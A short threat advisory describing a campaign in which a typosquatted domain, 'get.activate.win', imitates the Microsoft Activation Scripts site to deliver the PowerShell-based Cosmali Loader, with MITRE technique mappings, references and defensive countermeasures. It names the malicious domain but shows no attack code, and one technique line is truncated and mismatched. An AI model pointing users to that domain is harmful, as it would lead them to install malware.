PowerShell Malware Distributed Through Impersonated Microsoft Activation Sites

Credited by Freepik

VTA-004548 – PowerShell Malware Distributed Through Impersonated Microsoft Activation Sites

A typosquatted domain mimicking the popular Microsoft Activation Scripts (MAS) tool has emerged as a clever trap for Windows users seeking unlicensed activation, delivering PowerShell-based Cosmali Loader malware instead of legitimate scripts. Attackers registered “get.activate.win,” which differs by just one letter from the real “get.activated.win,” capitalizing on users hastily typing commands in PowerShell during activation processes like HWID or KMS emulation. This campaign gained visibility when infected users spotted alarming pop-up warning likely triggered by a security researcher who accessed the malware’s insecure control panel to notify victims urging them to check Task Manager for suspicious PowerShell processes and reinstall Windows.​

What sets this attack apart from run-of-the-mill phishing or drive-by downloads is its hyper-targeted exploitation of a specific user behavior, the rush to bypass Microsoft’s licensing using open-source MAS scripts hosted on GitHub. Unlike broad malware droppers that rely on email lures or fake updates, this leverages typosquatting in a niche ecosystem where tech-savvy but license-averse users (from home tinkerers to IT admins in testing environments) copy-paste commands without double-checking domains. The Cosmali Loader itself stands out for its modular payload delivery, previously observed deploying cryptominers and the XWorm remote access trojan (RAT), turning a simple activation mishap into persistent remote control or resource hijacking.

MAS maintainers quickly issued warnings, emphasizing the risks of executing unverified remote code, and recommended sandbox testing to avoid such pitfalls. This incident underscores a broader trend where unofficial activators become malware vectors, but its uniqueness lies in the researcher’s white-hat intervention via the attackers’ own sloppy C2 panel, turning a stealthy infection chain into a public wake-up call.

Severity:
Medium

Attack Surface:
Endpoint OS, Web Application

Tactics:
Command and Control, Defense Evasion, Discovery, Execution, Exfiltration, Initial Access

Techniques:
T1059.001 – Command and Scripting Interpreter: PowerShell
T1105 – Ingress Tool Transfer
T1071.001 – Application Layer Protocol: Web Protocols
T1036 – Masquerading (fake Microsoft activation domain)
T1189 – Drive-by Compromise (typosquatted domain as drive-by for script fetchers)
T1105 – Ingress Tool Transfer (downloads Cosmali Loader from fake domain)
T1027 – Obfuscated Files or Information (pop-up warnings via sloppy C2

Indicator of Compromise:
1. https://otx.alienvault.com/pulse/694ded64252279c20f5650d3

References:
1. https://www.reddit.com/r/antivirus/comments/1psglq4/comment/nv9ol7x/
2. https://x.com/struppigel/status/2003365461862588556
3. https://x.com/RussianPanda9xx/status/2003692375500341675
4.https://www.reddit.com/r/MAS_Activator/comments/1ptcqp1/told_i_have_been_infected_by_a_malware_called/

SuperPRO’s Threat Countermeasures Procedures:
1. Block known fake activation domains at DNS and proxy level
2. Disable or restrict PowerShell v2 via Group Policy
3. Enforce PowerShell Constrained Language Mode on endpoints
4. Enable AMSI logging and monitor suspicious encoded PowerShell commands
5. Block outbound PowerShell connections to unknown external domains
6. Educate users to avoid third-party Windows activation tools and script

Contributed by: Thivya